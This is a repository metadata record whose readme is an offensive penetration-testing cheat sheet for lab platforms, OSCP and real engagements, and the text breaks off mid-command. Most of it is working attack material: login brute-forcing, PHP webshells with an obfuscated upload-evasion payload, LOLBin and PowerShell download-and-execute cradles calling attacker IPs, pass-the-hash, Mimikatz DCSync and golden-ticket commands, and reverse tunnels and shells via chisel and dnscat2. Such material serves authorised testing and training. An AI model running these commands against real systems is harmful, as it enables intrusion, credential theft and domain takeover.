{"id":13538312,"url":"https://github.com/adon90/pentest_compilation","last_synced_at":"2025-10-07T07:22:24.926Z","repository":{"id":37396829,"uuid":"113831461","full_name":"adon90/pentest_compilation","owner":"adon90","description":"Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenarios","archived":false,"fork":false,"pushed_at":"2022-12-22T17:12:38.000Z","size":448,"stargazers_count":1344,"open_issues_count":3,"forks_count":408,"subscribers_count":72,"default_branch":"master","last_synced_at":"2025-05-23T04:08:17.221Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"XSLT","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/adon90.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-12-11T08:17:52.000Z","updated_at":"2025-05-14T17:39:26.000Z","dependencies_parsed_at":"2023-01-30T14:46:17.603Z","dependency_job_id":null,"html_url":"https://github.com/adon90/pentest_compilation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/adon90/pentest_compilation","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/adon90","download_url":"https://
codeload.github.com/adon90/pentest_compilation/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/adon90%2Fpentest_compilation/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":278737848,"owners_count":26037098,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-07T02:00:06.786Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:09.650Z","updated_at":"2025-10-07T07:22:24.891Z","avatar_url":"https://github.com/adon90.png","language":"XSLT","readme":"\u003cb\u003eTable of Contents\u003c/b\u003e\n\n- [Enumeration](#enumeration)\n  * [Generic Enumeration](#genumeration)\n  * [HTTP Enumeration](#httpenumeration)\n  * [SSH Enumeration](#sshenumeration)\n  * [SMB Enumeration](#smbenumeration)\n  * [SNMP Enumeration](#snmpenumeration)\n- [Exploitation](#explotation)\n  * [BOF Based Exploits](#bof)\n  * [Weak Credentials](#weakcreds)\n    * [HTTP Bruteforce](#httpbrute)\n    * [Password Cracking](#passcrack)\n  * [RCE](#rce)\n    * [PHP RCE](#phprce)\n    * [RCE via webshell](#rcewebshell)\n    * [RCE WMIC (powershellless)](#rcewmic)\n    * [LOLBins](#lolbins)\n- [Privilege Escalation](#privesc)\n  * [Linux](#linux)\n  * [Windows](#windows)\n  * [Kernel Exploits](#kernel)\n- [Tunneling \u0026 Port Forwarding](#tunneling)\n  * [SSH over HTTP](#sshovertcp)\n  
* [TCP over HTTP](#tcpoverhttp)\n    * [1. reGeorg](#regeorg)\n    * [2. ABPTTS](#abptts)\n  * [HTTP Redirectors](#httpredirectors)\n    * [1. socat](#socatred)\n    * [2. iptables](#iptablesred)\n  * [Windows Socks Proxy](#windowsocks)\n  * [Poor Man's VPN](#poor)\n- [Windows Active Directory](#windowsad)\n  * [Bypass Applocker](#applocker)\n  * [Pass The Hash](#pth)\n  * [Kerberos](#krb)\n  * [Miscellaneous](#miscwin)\n- [Reverse Shells](#revshells)\n  * [DNS with dnscat2](#dns)\n  * [ICMP](#icmp)\n  * [HTTP through proxy](#httpproxy)\n- [Miscellaneous](#misc)\n  * [Interactive Reverse Shell](#interactiveshell)\n  * [rbash Jail Escape](#jailescape)\n  * [Windows File Transfer](#windowstransfer)\n  * [Bypass VPN routing restrictions](#vpnrestrict)\n  * [AV Bypass](#avbypass)\n\n---\n\n\n\n\u003ca name=\"enumeration\"\u003e\u003c/a\u003e\u003ch2\u003e Enumeration \u003c/h2\u003e\n\n\u003ca name=\"genumeration\"\u003e\u003c/a\u003e\u003ch3\u003eGeneric Enumeration\u003c/h3\u003e\n\n- port fullscan\n\n- UDP scan\n\n\n\u003ca name=\"httpenumeration\"\u003e\u003c/a\u003e\u003ch3\u003e HTTP Enumeration\u003c/h3\u003e\n\n- dirsearch big.txt -e sh,txt,htm,php,cgi,html,pl,bak,old\n\n- banner inspection\n\n- review source code\n\n- bruteforce with cewl-based dictionary\n\n- searchsploit: look at versions properly\n\n- test all the paths with the exploits, mangle them\n\n- nmap --script vuln\n\n- nmap --script safe (ssl-cert, virtual hosts)\n\n- always intercept with Burp\n\n- nikto -h\n\n- LFI, RFI, SQL, RCE, XXE, SSRF injections\n\n- try the PUT method on all directories\n\n- Change POST body encoding with Burp\n\n- Bruteforce parameter names\n\n- dirsearch with cookie once authenticated\n\n- download vulnerable application from exploit-db and examine it\n\n\u003ca name=\"sshenumeration\"\u003e\u003c/a\u003e\u003ch3\u003eSSH Enumeration\u003c/h3\u003e\n\n- shellshock\n\n- bruteforce\n\n- user_enum\n\n- Debian OpenSSL Predictable PRNG\n\n\u003ca 
name=\"smbenumeration\"\u003e\u003c/a\u003e\u003ch3\u003eSMB Enumeration\u003c/h3\u003e\n\n- nmap --script vuln\n\n- nmap --script smb*\n\n- nmap --script smb-enum-shares,smb-ls\n\n- enum4linux\n\n\u003ca name=\"snmpenumeration\"\u003e\u003c/a\u003e\u003ch3\u003e SNMP Enumeration\u003c/h3\u003e\n\n- snmpcheck\n\n- snmpenum\n\n\u003ca name=\"explotation\"\u003e\u003c/a\u003e\u003ch2\u003e Exploitation \u003c/h2\u003e\n\n\u003ca name=\"bof\"\u003e\u003c/a\u003e\u003ch3\u003e BOF exploit-based \u003c/h3\u003e\n\n- change shellcode\n\n- make sure all badchars are removed\n\n- read the exploit carefully in case it modifies the shellcode\n\n- capture traffic with wireshark making sure the entire shellcode is transmitted\n\n- run the exploit several times\n\n- make sure the JMP ESP matches OS and language\n\n\n\u003ca name=\"weakcreds\"\u003e\u003c/a\u003e\u003ch3\u003e Weak Credentials \u003c/h3\u003e\n\n\n\u003ca name=\"httpbrute\"\u003e\u003c/a\u003e\u003cb\u003e HTTP Brute Force \u003c/b\u003e\n\n- wfuzz POST\n\n```wfuzz --hc 404 -c -z list,admin -z file,/root/Documents/SecLists/Passwords/korelogic-password.txt -d \"user=FUZZ\u0026password=FUZ2Z\" http://192.168.30.161/admin/index.php```\n\n- hydra POST (the third colon-separated field is the string that marks a failed login)\n\n```hydra 192.168.30.161 -s 80 http-form-post \"/admin/index.php:user=^USER^\u0026password=^PASS^:Moved Temporarily\" -l admin -P /root/Documents/SecLists/Passwords/korelogic-password.txt -t 20```\n\n- wfuzz NTLM\n\n```wfuzz -c --ntlm \"admin:FUZZ\" -z file,/root/Documents/SecLists/Passwords/darkc0de.txt --hc 401 https://\u003cip\u003e/api```\n\n- wfuzz Basic Auth through Proxy\n\n```wfuzz -c --hc 404,400,401 -z file,/root/Documents/Audits/Activos/names.txt -z file,/root/Documents/Audits/Activos/names.txt --basic \"FUZZ:FUZ2Z\" -p 127.0.0.1:8080 https://\u003cip\u003e/api/v1/```\n\n\n\u003ca name=\"passcrack\"\u003e\u003c/a\u003e\u003cb\u003e Password Cracking \u003c/b\u003e\n\n- zip\n\n`fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt file.zip `\n\n- 
/etc/shadow\n\n\u003cpre\u003e\nunshadow passwd shadow \u003e passwords\njohn --wordlist=/usr/share/wordlists/rockyou.txt passwords\n\u003c/pre\u003e\n\n- keepass \n\n\u003cpre\u003e\nkeepass2john /root/Desktop/NewDatabase.kdb \u003e file\njohn -incremental:alpha -format=keepass file\n\u003c/pre\u003e\n\n- Bruteforce Salted\n\n\u003cpre\u003e\nfor j in $(cat cipher); do echo $j; for i in $(cat digestion); do /root/Documents/HTB/Hawk/bruteforce-salted-openssl/bruteforce-salted-openssl -t 10 -f /usr/share/wordlists/rockyou.txt -c $j -d $i ../miau.txt -1 2\u003e\u00261 | grep \"candidate\" ; done ; done\n\u003c/pre\u003e\n\n\u003cpre\u003eopenssl aes-256-cbc -d -in ../miau.txt -out result.txt -k friends\u003c/pre\u003e\n\n\u003ca name=\"rce\"\u003e\u003c/a\u003e\u003ch2\u003e RCE \u003c/h2\u003e\n\n\u003ca name=\"phprce\"\u003e\u003c/a\u003e\u003ch3\u003ePHP RCE\u003c/h3\u003e\n\ntest: \n\n```\u003c?php phpinfo(); ?\u003e```\n\nsimple shell: \n\n```\u003c?php system($_GET[\"c\"]); ?\u003e```\n\n```\u003c?php `$_GET[\"c\"]`; ?\u003e```\n\nfile upload:\n\n```\u003c?php file_put_contents('/var/www/html/uploads/test.php', '\u003c?php system($_GET[\"c\"]);?\u003e'); ?\u003e```\n\nfile upload evasion:  rot13 + urlencode\n\n```\u003c?php $payload=\"%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E\"; file_put_contents('/var/www/html/uploads/test8.php', str_rot13(urldecode($payload))); ?\u003e```\n\n\n\u003ca name=\"rcewebshell\"\u003e\u003c/a\u003e\u003ch3\u003eRCE via webshell\u003c/h3\u003e\n\n- All pentest monkey reverse shells: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n\n- msfvenom x86/linux/shell_reverse_tcp -f elf\n\n- Metasploit `web_delivery` module\n\n- which wget | nc \u003cip\u003e \u003cport\u003e\n \n\u003ca name=\"rcewmic\"\u003e\u003c/a\u003e\u003ch3\u003eRCE via WMIC\u003c/h3\u003e\n\nPowershell without powershell:\n\nGenerate payload with 
web_delivery\n\n![powershellless1](https://user-images.githubusercontent.com/7115563/40374533-8da00e10-5de9-11e8-888e-3b1eaccb28b0.png)\n\nEncode Payload\n\n![powershellless2](https://user-images.githubusercontent.com/7115563/40374540-908e0ca8-5de9-11e8-9002-5f03193b10a5.png)\n\nInclude payload in xsl file\n\n![powershellless3](https://user-images.githubusercontent.com/7115563/40374546-92dcda84-5de9-11e8-99c8-9066ae129644.png)\n\n\u003cpre\u003ewmic process get brief /format:\"https://raw.githubusercontent.com/adon90/pentest_compilation/master/nops.xsl\"\u003c/pre\u003e\n\n![powershellless4](https://user-images.githubusercontent.com/7115563/40375266-73770028-5deb-11e8-92da-952692727bec.png)\n\n\u003ca name=\"lolbins\"\u003e\u003c/a\u003e\u003ch3\u003eLOLBINS\u003c/h3\u003e\n\n\u003cb\u003eSyncAppvPublishingServer\u003c/b\u003e\n\n\u003cpre\u003eSyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://192.168.48.129:8000/reverse.ps1') | IEX\"\u003c/pre\u003e\n\n![lolbin1](https://user-images.githubusercontent.com/7115563/40776727-ee904d00-64cb-11e8-8921-407581b13edf.png)\n\n\u003cb\u003erundll32\u003c/b\u003e\n\n\u003cpre\u003erundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();new%20ActiveXObject(\"WScript.Shell\").Run(\"regsvr32 /s /n /u /i:http://192.168.48.130:8080/bhRxgASz0.sct scrobj.dll\")\u003c/pre\u003e\n\n\n\u003ca name=\"privesc\"\u003e\u003c/a\u003e\u003ch2\u003e Privilege Escalation\u003c/h2\u003e\n\n\n\u003ca name=\"linux\"\u003e\u003c/a\u003e\u003ch3\u003e Linux Privilege Escalation \u003c/h3\u003e\n\n- sudo -l\n- Kernel Exploits\n- OS Exploits\n- Password reuse (mysql, .bash_history, 000-default.conf...)\n- Known binaries with suid flag and interactive (nmap)\n- Custom binaries with suid flag either using other binaries or with command execution\n- Writable files owned by root that get executed (cronjobs)\n- MySQL as root\n- Vulnerable services (chkrootkit, logrotate)\n- Writable /etc/passwd\n- 
Readable .bash_history\n- SSH private key\n- Listening ports on localhost\n- /etc/fstab\n- /etc/exports\n- /var/mail\n- Process as other user (root) executing something you have permissions to modify\n- SSH public key + Predictable PRNG\n- apt update hooking (Pre-Invoke)\n- Capabilities\n\n\u003ca name=\"windows\"\u003e\u003c/a\u003e\u003ch3\u003e Windows Privilege Escalation \u003c/h3\u003e\n\n- Kernel Exploits\n- OS Exploits\n- Pass The Hash\n- Password reuse\n- DLL hijacking (Path)\n- Vulnerable services\n- Writable services binaries path\n- Unquoted services\n- Listening ports on localhost\n- Registry keys\n\n\n\u003ca name=\"kernel\"\u003e\u003c/a\u003e\u003ch3\u003e Kernel Exploits \u003c/h3\u003e\n\nLinux: https://github.com/lucyoa/kernel-exploits\n\nWindows: https://github.com/abatchy17/WindowsExploits\n\n\n\n\u003ca name=\"tunneling\"\u003e\u003c/a\u003e\u003ch2\u003eTunneling \u0026 Port Forwarding\u003c/h2\u003e\n\n\u003ca name=\"sshovertcp\"\u003e\u003c/a\u003e\u003ch3\u003eSSH over HTTP (Squid)\u003c/h3\u003e\n\n\u003cb\u003e socat \u003c/b\u003e\n\n\u003cpre\u003esocat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128\n\nssh john@127.0.0.1 -p 9999\u003c/pre\u003e\n\n\n\u003cb\u003eproxytunnel \u003c/b\u003e\n\n\u003cpre\u003eproxytunnel -p 192.168.1.41:3128 -d 127.0.0.1:22 -a 5555\n\nssh john@127.0.0.1 -p 5555\u003c/pre\u003e\n\n\u003cb\u003eproxychains \u003c/b\u003e\n\n\u003cpre\u003ehttp 192.168.1.41 3128\n\nproxychains ssh john@127.0.0.1\u003c/pre\u003e\n\n![proxychains](https://user-images.githubusercontent.com/7115563/33822522-1e15dbee-de58-11e7-9953-3da8ff684cfc.png)\n\n\n\u003cb\u003ecorkscrew \u003c/b\u003e\n\n\u003cpre\u003essh john@192.168.1.41 -t /bin/sh\u003c/pre\u003e\n\n![cork](https://user-images.githubusercontent.com/7115563/33822672-b92a51f0-de58-11e7-9936-06056b7903b8.png)\n\n\n\u003ca name=\"tcpoverhttp\"\u003e\u003c/a\u003e\u003ch3\u003e TCP over HTTP \u003c/h3\u003e\n\nFor this technique, it is necessary to 
be able to upload a file to a webserver.\n\n\u003ca name=\"regeorg\"\u003e\u003c/a\u003e\u003cb\u003e 1. reGeorg \u003c/b\u003e\n  \n  Upload the file to the server\n  \n  ![regeorge2](https://user-images.githubusercontent.com/7115563/33883424-028c9f0e-df3c-11e7-9559-b35667ae76db.png)\n  \n  Tunnel creation\n  \n  `python reGeorgSocksProxy.py -p 5555 -u \"http://\u003cip\u003e/admin/uploads/reGeorg.jsp\"`\n  \n  Proxychains config\n  \n  ![regeorge1](https://user-images.githubusercontent.com/7115563/33883419-fcc15416-df3b-11e7-89a9-499ffc1de9cf.png)\n  \n  \u003cpre\u003e\nproxychains nmap -F -sT 127.0.0.1\nproxychains mysql -u root -p -h 127.0.0.1\nproxychains ssh localhost\n\u003c/pre\u003e\n\n![regeorge3](https://user-images.githubusercontent.com/7115563/33883422-017021fe-df3c-11e7-8f99-f02de5084c02.png)\n\nReference: https://sensepost.com/discover/tools/reGeorg/\n\n \u003ca name=\"abptts\"\u003e\u003c/a\u003e\u003cb\u003e 2. ABPTTS \u003c/b\u003e\n  \nUpload File\n\n![abbtts5](https://user-images.githubusercontent.com/7115563/33883774-6d249ffa-df3d-11e7-9f3f-68bf1e70465f.png)\n\nConfigure proxychains and create the tunnel\n\n```python abpttsclient.py -c tomcat_walkthrough/config.txt -u http://192.168.1.128/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22```\n\nUsage\n\n```ssh -p 22222 user@127.0.0.1```\n\n![abbtts7](https://user-images.githubusercontent.com/7115563/33883891-dc2f3c70-df3d-11e7-84e9-ebd9eab9ebee.png)\n\nReference: https://github.com/nccgroup/ABPTTS\n\n\n\u003ca name=\"httpredirectors\"\u003e\u003c/a\u003e\u003ch3\u003eHTTP Redirectors\u003c/h3\u003e\n\n\u003ca name=\"socatred\"\u003e\u003c/a\u003e\u003cb\u003e 1. socat \u003c/b\u003e\n \n\u003cpre\u003esocat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80\u003c/pre\u003e\n\n\n![socatt](https://user-images.githubusercontent.com/7115563/42031184-a8b3deee-7ad5-11e8-96ae-9b38bfe82df2.png)\n\n\u003ca name=\"iptablesred\"\u003e\u003c/a\u003e\u003cb\u003e 2. 
iptables \u003c/b\u003e\n \n\u003cpre\u003eiptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPT\niptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80\niptables -t nat -A POSTROUTING -j MASQUERADE\niptables -I FORWARD -j ACCEPT\niptables -P FORWARD ACCEPT\nsysctl net.ipv4.ip_forward=1\u003c/pre\u003e\n\n![iptables](https://user-images.githubusercontent.com/7115563/41294963-97cc925c-6e59-11e8-8adf-8db85f6ffaf2.png)\n\n\n\u003ca name=\"windowsocks\"\u003e\u003c/a\u003e\u003ch3\u003e Windows Socks Proxy \u003c/h3\u003e\n\nIn this case it is used to reach Burp, listening on a NATed Windows VM, from other PCs on the same network as the Windows host.\n\nFrom the Windows host machine (IP: 192.168.1.206)\n\n\u003cpre\u003e\nImport-Module .\\Invoke-SocksProxy.psm1\nInvoke-SocksProxy -bindPort 1234\n\u003c/pre\u003e\n\n![invokesocks](https://user-images.githubusercontent.com/7115563/49870467-b63bb480-fe13-11e8-807d-8422e5837b58.png)\n\nFrom another PC on the Windows host's network (IP: 192.168.1.69)\n\nConfigure `proxychains.conf`:\n\n\u003cpre\u003e socks4 \t192.168.1.206 1234 \u003c/pre\u003e\n\n\u003cpre\u003eproxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:192.168.48.158:8080\u003c/pre\u003e\n\nThe command above makes Burp (listening on the NATed machine) reachable from 192.168.1.69 on port 8081.\n\nNow, configure the proxy in the browser:\n\n![proxyconf](https://user-images.githubusercontent.com/7115563/49870450-aae88900-fe13-11e8-8c95-4208f20cd8ec.png)\n\nAll the traffic is logged in Burp on the NATed machine.\n\nReference: https://github.com/p3nt4/Invoke-SocksProxy\n \n \u003cb\u003e Chisel \u003c/b\u003e\n \n Attacker\n \n \u003cpre\u003e./chisel_1.7.1_linux_amd64 server -p 8000 --reverse\u003c/pre\u003e\n \n Victim\n \n \u003cpre\u003e.\\chisel.exe client 37.187.112.19:8000 R:socks\u003c/pre\u003e\n \n The reverse SOCKS listener opens on the attacker side on port 1080 by default, so `proxychains.conf` needs `socks5 127.0.0.1 1080`.\n \n Attacker\n \n \u003cpre\u003eproxychains nmap -sT --top-ports 10 --open 
127.0.0.1\u003c/pre\u003e\n \n ![chisel](https://user-images.githubusercontent.com/7115563/127473605-6158c455-6d43-4e88-876c-d91422771bd6.png)\n\n \n References: https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html\n \n\n\u003ca name=\"poor\"\u003e\u003c/a\u003e\u003ch3\u003e Poor Man's VPN \u003c/h3\u003e\n\nForward traffic over SSH without needing ```ssh -D \u003cport\u003e``` and proxychains: sshuttle routes the given subnets through the SSH host transparently.\n\n\u003cpre\u003esshuttle -vr user@192.168.207.57 1X0.1X.0.0/16\u003c/pre\u003e\n\n![sshuttle](https://user-images.githubusercontent.com/7115563/42047219-02a13b70-7b00-11e8-9686-8bf2f44bee81.png)\n\nProof:\n\n![mantis2](https://user-images.githubusercontent.com/7115563/34785499-a0e7d838-f631-11e7-869f-d6fcdc1051e9.png)\n\nReference: http://teohm.com/blog/using-sshuttle-in-daily-work/\n\n\n\n\u003ca name=\"windowsad\"\u003e\u003c/a\u003e\u003ch2\u003e Windows AD Environment \u003c/h2\u003e\n\n\u003ca name=\"applocker\"\u003e\u003c/a\u003e\u003ch3\u003e Bypass Applocker \u003c/h3\u003e\n\n\u003cb\u003e1. rundll32\u003c/b\u003e\n\n```rundll32.exe PowerShdll.dll,main```\n\n![applocker](https://user-images.githubusercontent.com/7115563/34455568-dfe7d7c6-ed81-11e7-9869-de2d4e92f3aa.png)\n  \n  Reference: https://github.com/p3nt4/PowerShdll\n  \n\u003cb\u003e2. 
Alternative powershell files\u003c/b\u003e\n\n![applocker2](https://user-images.githubusercontent.com/7115563/34455569-e0136c6a-ed81-11e7-9b0e-127ae9d395e0.png)\n  \n  ```C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise```\n  \n  \n \u003ca name=\"pth\"\u003e\u003c/a\u003e \u003ch3\u003e Pass The Hash \u003c/h3\u003e\n  \n  \n  \u003cb\u003e Invoke a command Remotely \u003c/b\u003e\n  \n  \u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1')\n \n Invoke-WMIExec -Target SVHOST2  -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"powershell whoami | out-file \\\\SVHOST2\\C$\\windows\\bitch.txt\"\n\u003c/pre\u003e\n\n  \u003cb\u003e Invoke Mimikatz Remotely \u003c/b\u003e\n  \n  \u003cpre\u003eInvoke-WMIExec -Target SVHOST2  -Username Administrator\n-Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"powershell -Enc SQBFA...AoA\"\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455757-1f6aed1c-ed86-11e7-9415-595fa5e8d6e7.png)\n  \n  \u003cb\u003e Pass The Hash with Mimikatz \u003c/b\u003e\n  \n  \u003cpre\u003e Invoke-Mimikatz -Command '\"sekurlsa::pth /user:adm_maint /ntlm:cbe55f143fcb6d4687583af520123b89 /domain:lazuli\"'\u003c/pre\u003e\n  \n  \n  \u003ca name=\"krb\"\u003e\u003c/a\u003e\u003ch3\u003e Kerberos \u003c/h3\u003e\n  \n  \n  \u003cb\u003e Generate Golden Ticket (Domain Admin Required) \u003c/b\u003e\n  \n  \u003cpre\u003eInvoke-Mimikatz -Command '\"lsadump::dcsync /domain:LAZULI.CORP /user:krbtgt\"'\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455725-7230ee30-ed85-11e7-9333-16372355ce60.png)\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455734-89934d5c-ed85-11e7-960e-9659e099c9df.png)\n  \n  \u003cpre\u003eInvoke-Mimikatz  -Command '\"kerberos::golden /user:adon /domain:LAZULI.CORP /krbtgt:ca1c2aeda9160094be9971bdc21c50aa 
/sid:S-1-5-21-1238634245-2147606590-2801756923 /id:500 /ticket:admin.kirbi /ptt\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455745-9edd0360-ed85-11e7-84f0-6d62e621613b.png)\n  \n  \u003cpre\u003eInvoke-Mimikatz  -Command '\"kerberos::ptt admin.kirbi\"'\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455747-b285372a-ed85-11e7-9374-c481108db77e.png)\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455748-bb0512c6-ed85-11e7-8d40-b6516cf8b0f3.png)\n  \n \u003ca name=\"miscwin\"\u003e\u003c/a\u003e\u003ch3\u003e Miscellaneous \u003c/h3\u003e\n  \n \u003cb\u003e Invoke Mimikatz \u003c/b\u003e\n  \n  \u003cpre\u003eIEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz\u003c/pre\u003e\n  \n\u003cb\u003e Mimikatz C# \u003c/b\u003e\n\n\u003cpre\u003eC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /unsafe katz.cs\u003c/pre\u003e\n\nhttps://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7\n  \nIf the compiler is outdated:\n\n\u003cpre\u003enuget install Microsoft.Net.Compilers\u003c/pre\u003e\n  \n   \u003cb\u003e Runas Powershell \u003c/b\u003e\n  \n  ```Start-Process powershell.exe -Verb runas```\n  ```Start-Process powershell.exe -Credential \u003cuser\u003e```\n  \n  \u003cb\u003e View Shares With Permissions \u003c/b\u003e\n  \n  \u003cpre\u003epowershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-ShareFinder -CheckShareAccess\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455620-34f292b4-ed83-11e7-92b0-3b8dd387146f.png)\n  \n  \n  \u003cb\u003e View files whose name contains certain words on a share (recursive) 
\u003c/b\u003e\n  \n  \u003cpre\u003e ls -Path \\\\SVHOST1.LAZULI.CORP\\tmp$ -Include \"*pass*\",\"*admin*\",\"*secret*\" -Recurse -ErrorAction SilentlyContinue\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455641-aa03adf4-ed83-11e7-8333-a69366714921.png)\n\n\u003cb\u003e View files whose name contains certain words on the whole host (recursive) \u003c/b\u003e\n\n\u003cpre\u003edir -Path \\\\SVHOST1.LAZULI.CORP -Include \"*pass*\",\"*admin*\",\"*secret*\" -Recurse -ErrorAction SilentlyContinue\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455649-dcc941ea-ed83-11e7-9428-a702f254e807.png)\n\n\u003cb\u003e Connect to MSSQL Database \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/michaellwest/PowerShell-Modules/master/CorpApps/Invoke-SqlCommand.ps1')\n\nInvoke-SqlCommand -Server 172.11.14.89 -Database master -Username sa -Password \u003cpassword\u003e -Query \"exec sp_databases\" \u003c/pre\u003e\n\n\u003cb\u003e Port Scanning \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1')\n\nInvoke-Portscan -Hosts [ip] -TopPorts 50\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455679-6e630230-ed84-11e7-995e-2eea1a6fc8dc.png)\n  \n  \n  \u003cb\u003e View Domain Admins \u003c/b\u003e\n  \n  \u003cpre\u003e net groups /domain \"Domain Admins\"\u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455690-9e648d78-ed84-11e7-9a84-9b335530a31e.png)\n  \n  \u003cb\u003e View Domain Controllers \u003c/b\u003e\n  \n  \u003cpre\u003enltest /dclist:\u003cdomain\u003e \u003c/pre\u003e\n  \n  ![image](https://user-images.githubusercontent.com/7115563/34455698-d1504074-ed84-11e7-85ad-c4bb196c9d44.png)\n  \n\n  \n\u003cb\u003e Get Hashes \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes\u003c/pre\u003e\n\n  ![image](https://user-images.githubusercontent.com/7115563/34455769-66cb31bc-ed86-11e7-846e-090647d8e32f.png)\n  \n  \n\u003cb\u003e Check Pass The Hash against multiple servers\u003c/b\u003e\n\n\u003cpre\u003e$hosts = @(\"SVDC1.LAZULI.CORP\",\"SVFILES.LAZULI.CORP\",\"SVHOST1.LAZULI.CORP\",\"SVHOST2.LAZULI.CORP\",\"SVFILES2.LAZULI.CORP\")\n\nforeach ($h in $hosts){ Invoke-WMIExec -Target $h -Username Administrator -Hash 78560bbcf70110fbfb5add17b5dfd762 -Command \"hostname\" -Verbose }\n\n\u003c/pre\u003e\n\n![image](https://user-images.githubusercontent.com/7115563/34455798-0bdc77ec-ed87-11e7-9504-6b9ec6fc2a8d.png)\n\n\u003cb\u003e Run web_delivery as another identity \u003c/b\u003e\n\n\u003cpre\u003e runas-cabesha-webdelivery -url [url_webdelivery] -user [user] -pass [pass] \u003c/pre\u003e\n\n![cabesha](https://user-images.githubusercontent.com/7115563/42811084-e286eb5a-89b9-11e8-8ec8-b0b8c3980774.jpg)\n\n\nReferences: https://www.hacklikeapornstar.com/\n  \n\n\n\u003ca name=\"revshells\"\u003e\u003c/a\u003e\u003ch2\u003e Reverse Shells \u003c/h2\u003e\n\n\u003ca name=\"dns\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse DNS shell with dnscat2 (PowerShell client) \u003c/h3\u003e\n\n\u003cb\u003e Server \u003c/b\u003e\n\n\u003cpre\u003eruby dnscat2.rb -e open --no-cache tunnel.domain.com\u003c/pre\u003e\n\n\n\u003cb\u003e Client \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1'); Start-Dnscat2 -Domain tunnel.domain.com -DNSServer 8.8.4.4 